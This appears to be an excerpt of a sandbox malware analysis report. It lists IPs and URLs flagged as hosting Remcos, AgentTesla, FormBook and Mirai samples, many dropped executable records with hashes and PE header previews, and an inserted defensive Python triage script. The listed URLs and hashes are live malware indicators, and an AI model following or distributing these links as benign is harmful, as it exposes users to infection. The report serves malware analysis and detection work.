                                                                                                                                                                                                                                                                                                          • 35.170.112.145
                                                                                                                                                                                                                                                                                                          http://7xv6.mjt.lu/lnk/AXMAAFFvlI0AAAAAAAAAA8Ye8moAAABKhgwAAAAAAAq7pgBnByOSeYt8cGpTTPaPBTAKJeV-UQAKnpI/1/EWmySlSHcyP6g54g0SDc-g/aHR0cHM6Ly9zbmlwLmx5L2V6NGxydwGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 44.222.54.177
                                                                                                                                                                                                                                                                                                          https://link.edgepilot.com/s/66670586/vw0py2v3TkuVLaWS3JAaPg?u=https://bharatgroup.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 52.54.96.194
                                                                                                                                                                                                                                                                                                          https://event.stibee.com/v2/click/NDA4MDIvMjQzOTA2MS80OTAyMzcv/aHR0cHM6Ly9uLm5ld3MubmF2ZXIuY29tL21uZXdzL2FydGljbGUvMDI1LzAwMDMzOTE2NDc_c2lkPTEwMQGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 34.200.65.202
                                                                                                                                                                                                                                                                                                          CSCUSnL0Vxav3OB.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          tyRPPK48Mk.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          RFQ_PO_KMM7983972_ORDER_DETAILS.jsGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.15.20
                                                                                                                                                                                                                                                                                                          TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXEGet hashmaliciousAgentTesla, RedLineBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          firmware.sh4.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          TENDER Qatar Imports CorporationsLTCASTK654824.B26_PDF_.exeGet hashmaliciousFormBook, LummaC StealerBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          iUAAvj0XNL.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 169.233.212.251
                                                                                                                                                                                                                                                                                                          hNX3ktCRra.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 165.160.13.20
                                                                                                                                                                                                                                                                                                          KS5ASy17Uw.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 169.233.96.85
                                                                                                                                                                                                                                                                                                          AMAZON-02US10092024150836 09.10.2024.vbeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                          • 18.163.12.6
                                                                                                                                                                                                                                                                                                          https://w7950.app.blinkops.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 18.245.46.55
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 157.175.218.43
                                                                                                                                                                                                                                                                                                          Hesap-hareketleriniz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                                                                          • 13.248.252.114
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 18.217.104.207
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                                                                                          • 54.101.122.180
                                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                          • 52.222.236.48
                                                                                                                                                                                                                                                                                                          https://w7950.app.blinkops.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 65.9.66.7
                                                                                                                                                                                                                                                                                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                                                                          • 52.222.236.120
                                                                                                                                                                                                                                                                                                          na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                                          • 54.182.196.194
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context

Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type: PE32 executable (console) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1353216
Entropy (8bit): 5.324373911781983
Encrypted: false
SSDEEP: 12288:KC4VQjGARQNhiuXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:KOCAR0iusqjnhMgeiCl7G0nehbGZpbD
MD5: 0BA21AFD285C8A61389C298D0B32D0A1
SHA1: 0AEA9F8C7EA2BEACCA80D536C17F877FDB8124DE
SHA-256: C8493E9A0AA0CBC825949549DE06C8E9141DC5A6B69975A333DB2B1FE5989DB1
SHA-512: EC23535125BC4E0CE2900D6B74880EF8210982DCEC14499FA89021AF453E3BBD1B8A7A0C8DCCE07B8AF95E2FDA7C2549E23EC45C0248CBBC6F89291B76D1F39D
Malicious: true
Antivirus:
• Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!.............................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1294848
Entropy (8bit):5.28267990443834
Encrypted:false
SSDEEP:12288:DNUpaKghRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:DCMKgnsqjnhMgeiCl7G0nehbGZpbD
MD5:1E484E750C3622EFE2B346E565427D83
SHA1:80DA86219F504006D64F284AA38BFAF9CD35F803
SHA-256:3AFCDD37BDE82918C7C4AB331D3EE9AA4AE94D246360FAF7617963EA2CC1C245
SHA-512:5D019601113599A112857A46F70639F2298BF5A030336E60788FE8899793D6983AD5BFA4676648B2AA3B38405583A449ACAD9D21368C1650CFCB2A47CD324C68
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .....HK......................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1314304
Entropy (8bit):5.274116975440763
Encrypted:false
SSDEEP:12288:9MEhwdbT6Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:7KdH6sqjnhMgeiCl7G0nehbGZpbD
MD5:F1642246A278D7DF16D8DE5255814A12
SHA1:B7BE70B7D19F577F966E6E92B69F3B40E7784E13
SHA-256:E7C9EC2E249583B572CDDEB82368D8A1013278851F7EED7898ADB899135AE436
SHA-512:1414217710C843F865C969C38DCE86C3AFCE683CD3260D3426791681782B93F077EE3D6DA1A64800F4EACC5E83A71588CB2112B19E8F0FFF80399A6CCAF2A9E9
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !........... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2203136
Entropy (8bit):7.647019307319807
Encrypted:false
SSDEEP:49152:cK0eqkSR7Xgo4TiRPnLWvJGDmg27RnWGj:cK0pR7Xn4TiRCvJGD527BWG
MD5:3048AD7EB40261BB66748730A168BCD7
SHA1:FA5C48BB9FF6D5ED247D44137339E5EC15A9BAC1
SHA-256:98FE4DFC64F8FE0B8EC93A29A55828D7A665810F4F54820281315B1733337F83
SHA-512:5707DF40509348FEEBEC133E29D526FE9BCFF223851D2CF978485CB96204C100A9367A5DC21C6E6AD10A25905B273BD94258C48083916D4CC9445D248ED40228
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@...........................".....8S"..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2369024
Entropy (8bit):7.5650404779456
Encrypted:false
SSDEEP:49152:+fYP1JsEDkSR7Xgo4TiRPnLWvJGDmg27RnWGj:+YPBR7Xn4TiRCvJGD527BWG
MD5:0788E9FD7B50A4409CD916805AF6E87B
SHA1:FD51CCE06C46175ECD3F73692FA7664E2EEA16EC
SHA-256:52F976092999D9B68EC8D75D4BA06745546F216EDB590C9AB278B51823D80303
SHA-512:B455C16994257F6726B75B294087B93A23706657348872D0613D284283A20524FEA1DFF4A81D1229C79A1FD5E4D9BCAFC8C695E9BF40BD301B8F52CB6B387712
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................
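The fields in these dropped-file records (Size, Entropy (8bit), MD5/SHA1/SHA-256/SHA-512, File Type) can be recomputed locally to confirm that a file in hand is the one the report describes, or to triage further files from the same infection. The script below is an added example and is not Joe Sandbox's code. The KNOWN_BAD_SHA256 set is copied from the SHA-256 fields of the dropped-file records in this section; the stub PE builder, the 7.0 bits-per-byte "packed" threshold and the PE32/PE32+ classification by optional-header magic are this example's own assumptions, not fields the report derives that way.

```python
import hashlib
import math
import struct
import sys

# SHA-256 values copied (lower-cased) from the dropped-file records in this section.
KNOWN_BAD_SHA256 = {
    "c8493e9a0aa0cbc825949549de06c8e9141dc5a6b69975a333db2b1fe5989db1",
    "3afcdd37bde82918c7c4ab331d3ee9aa4ae94d246360faf7617963ea2cc1c245",
    "e7c9ec2e249583b572cddeb82368d8a1013278851f7eed7898adb899135ae436",
    "98fe4dfc64f8fe0b8ec93a29a55828d7a665810f4f54820281315b1733337f83",
    "52f976092999d9b68ec8d75d4ba06745546f216edb590c9ab278b51823d80303",
    "29dfadcdc999a66d20f31f516d09ec52368a49f8894b9e6ee7084da221362e54",
}

# Assumed threshold: the two ~7.6-entropy records above look packed/compressed, the ~5.2 ones do not.
PACKED_ENTROPY_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte over the whole file, i.e. the report's 'Entropy (8bit)' (0.0 .. 8.0)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_kind(data: bytes):
    """Classify like the report's 'File Type': MZ -> e_lfanew -> 'PE\\0\\0' -> optional-header magic."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # Signature (4 bytes) + COFF header (20 bytes) precede the optional header; its first WORD is the magic.
    if e_lfanew + 0x1A > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    magic = struct.unpack_from("<H", data, e_lfanew + 0x18)[0]
    return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)


def triage(data: bytes) -> dict:
    """Recompute the record fields and flag a match against the indicators listed above."""
    entropy = shannon_entropy(data)
    sha256 = hashlib.sha256(data).hexdigest()
    return {
        "size": len(data),
        "entropy": entropy,
        "md5": hashlib.md5(data).hexdigest(),
        "sha1": hashlib.sha1(data).hexdigest(),
        "sha256": sha256,
        "sha512": hashlib.sha512(data).hexdigest(),
        "file_type": pe_kind(data),
        "packed_hint": entropy >= PACKED_ENTROPY_THRESHOLD,
        "known_bad": sha256 in KNOWN_BAD_SHA256,
    }


def make_stub_pe(machine: int, magic: int) -> bytes:
    """Constructed minimal MZ/PE image for offline testing; not one of the dropped files."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew: PE signature right after the DOS header
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics (IMAGE_FILE_EXECUTABLE_IMAGE | 32BIT_MACHINE)
    coff = struct.pack("<HHIIIHH", machine, 1, 0, 0, 0, 0xE0, 0x0102)
    optional = struct.pack("<H", magic) + bytes(0xE0 - 2)
    return bytes(dos) + b"PE\0\0" + coff + optional


if __name__ == "__main__":
    paths = sys.argv[1:]
    samples = [(p, open(p, "rb").read()) for p in paths] if paths else [
        ("stub-pe32", make_stub_pe(0x14C, 0x10B)),    # Intel 80386 stub
        ("stub-pe32+", make_stub_pe(0x8664, 0x20B)),  # x86-64 stub
    ]
    for name, blob in samples:
        r = triage(blob)
        print(f"{name}: {r['file_type']} size={r['size']} entropy={r['entropy']:.3f} "
              f"packed_hint={r['packed_hint']} known_bad={r['known_bad']} sha256={r['sha256']}")
```

Run it as `python triage.py <file>...` against files recovered from a host; with no arguments it triages the two constructed stubs. Two things in the records themselves are worth reading alongside the output: the four ~1.2 to 1.35 MB records carry near-identical SSDEEP values (the same `...Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB...` chunk and the same `sqjnhMgeiCl7G0nehbGZpbD` second half), as do the two ~2.2 to 2.4 MB records, which is what you would expect when the same code is written into several different host executables; and the ~7.6-entropy pair stands well apart from the ~5.2-entropy files, so an entropy check on unknown drops from the same process is a cheap first filter before exact-hash matching.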
Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1245184
Entropy (8bit):5.123550763702093
Encrypted:false
SSDEEP:12288:l62SYUcknncXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:SYUckncsqjnhMgeiCl7G0nehbGZpbD
MD5:890AAEA33D7FC03FA431773CB3C093D7
SHA1:EA9FB1DDD4D2F8F2658C4FD9A6897BB56BACEF75
SHA-256:29DFADCDC999A66D20F31F516D09EC52368A49F8894B9E6EE7084DA221362E54
SHA-512:6EB513B52BB877303553AB9138CB2F07DD5DFC9DC71BFD8BBFA35EA0F3223772B38AF4A31543D206A8AC306D8A57D884BB151EF54641F8ECD5BC4E0DC005529D
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@..............................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1640448
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.166642966269705
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:h+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaS6Dmg27RnWGj:LSktbpID527BWG
                                                                                                                                                                                                                                                                                                          MD5:EC3749A9B42B7FBACA94D58BF80B394A
                                                                                                                                                                                                                                                                                                          SHA1:69F7AF695512D94CC5169E4CD23B6F61BD36CDAD
                                                                                                                                                                                                                                                                                                          SHA-256:5010189C827464F58BF5C48B4B24B4CCC70C6C56669B77DB5FDE7FE5368598A8
                                                                                                                                                                                                                                                                                                          SHA-512:4159D37351415AF41829D2199E76536015F7CFC04BA4A13EA588E8F42AB681CB3CF78332352BA767BD9B968114F5D11DD1E32224D9949C93E770F44945FC3C67
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................P..... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):2953728
                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.094616078157681
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:49152:qGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxL9Dmg27RnWGj:24OEtwiICvYMRfdD527BWG
                                                                                                                                                                                                                                                                                                          MD5:F8E477BBCD29C09EF869459B50E47EF0
                                                                                                                                                                                                                                                                                                          SHA1:5D53B8AA442D170663B2F730839AA640772F9F9B
                                                                                                                                                                                                                                                                                                          SHA-256:DBEA4E3C5837220326A4735F6F4A57ACCF2D072C83868F3CA687EBBDF7C47B0E
                                                                                                                                                                                                                                                                                                          SHA-512:234F7796FD9679C5A33329EB7AE61B93F6F21A3369DA04F3690CB992C96AB1EB0300E2F2608BB19889E7E0C613F7CE4AF5D37967B964F8740CD7654F1F765409
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.......-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1485824
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.496381029949622
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:24576:fAMuR+3kMbVjh+sqjnhMgeiCl7G0nehbGZpbD:ID+lbVjhSDmg27RnWGj
                                                                                                                                                                                                                                                                                                          MD5:0BDE3DA2E7745E8945865ADA4532AEB6
                                                                                                                                                                                                                                                                                                          SHA1:8F6E3C546FFC329902479BB83EC6F6F31BE6D48E
                                                                                                                                                                                                                                                                                                          SHA-256:30335529149140D172C9597809C7D64034550D7DA8C7574D25E45B06D861EB50
                                                                                                                                                                                                                                                                                                          SHA-512:D6FE71406DF9ADC5606EDCF3426AB98519981D6E9098A2761E3C3B57E85B639180EB9A765D301563340673488D215CD4B8CB2730A91A0FC568E035AF24573B18
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                          Size (bytes):1290240
                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.277755257777859
                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                          SSDEEP:12288:mImGUcsvZZdubv7hfl3hXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlRsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                          MD5:4D4DF10337248271E6C2C8AEA816774A
                                                                                                                                                                                                                                                                                                          SHA1:A819A529406A5BE1668788DADBF36A10AE96AEE5
                                                                                                                                                                                                                                                                                                          SHA-256:7E67D35C90429228B069506253D5F40492AC6BBAD4511CD81D409026F21B3008
                                                                                                                                                                                                                                                                                                          SHA-512:20CB44F764F770572BFE729D2B1505C580B2B23A07472C50D282C727C15877AD7972DF4D23BF1CADCE6C39B42E6B14F14C1A3E283CE2799362F2EA313696B808
                                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1644544
Entropy (8bit):5.694789979832765
Encrypted:false
SSDEEP:24576:P0vHyeLj8trn3wsMsqjnhMgeiCl7G0nehbGZpbD:Ktj4rgs4Dmg27RnWGj
MD5:C4C9AA7DDCAEEF2C0C6920F8F5612FE3
SHA1:DDE6317067C2EE2D48C66163BFA1A39BA1976B05
SHA-256:7A396D0028EB8430564EE61A3E0124D93649957D985DB22CCBB4471069E6D67F
SHA-512:3DFE73D118181403A85A36F4AA62D59CB402DD9A698DB2DA23E780AD856EF72E4F9ED3D0065B27870C629F92437D9FED13B27AC8A35A41C083A1BA8FFB71A75A
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1781760
Entropy (8bit):7.279671066391976
Encrypted:false
SSDEEP:24576:zoMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZpsqjnhMgeiCl7G0nehbGZpv:64i0wGJra0uAUfkVy7/ZtDmg27RnWGj
MD5:9AEBB2C016C62B639B0916FC5DCB2DFA
SHA1:33A6F161D261A812696348319C86C0BD22654A4A
SHA-256:EC1A2C9B01DE3848CC16C796796F7F6DFDA5209A6DE28985616E2FC7D4C38598
SHA-512:29E29202827A726729A03E093618E378397647344FA6C3C1002599E3176896CFEDC0B3FF5BC8CE4E13B7B2254B40164E87318FD2A622139AE44DA246FB6808E3
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................7...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1318400
Entropy (8bit):7.448757802040289
Encrypted:false
SSDEEP:24576:weR0gB6axoCf0R6RLQRF/TzJqe58BimmsqjnhMgeiCl7G0nehbGZpbD:8gHxmR6uBTzge5MimqDmg27RnWGj
MD5:DE9C03CEA2B81E07D6E7A838DE73F05B
SHA1:E48D334FD0ECF1EF4A19E0B1E1DC6018B23AACE9
SHA-256:23831CC1970439FCA89444E441036933A1E9D0C82207F0D8981280980D124A3A
SHA-512:54CEDF9BCBA3BF50C9BA0AA68DF82BE55A191470E3365E732DD396B5D03B399DCDA13C88A80E08C00F6BCB66C50A862CCE0499B130465CF7AC3A2CE330138374
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1375232
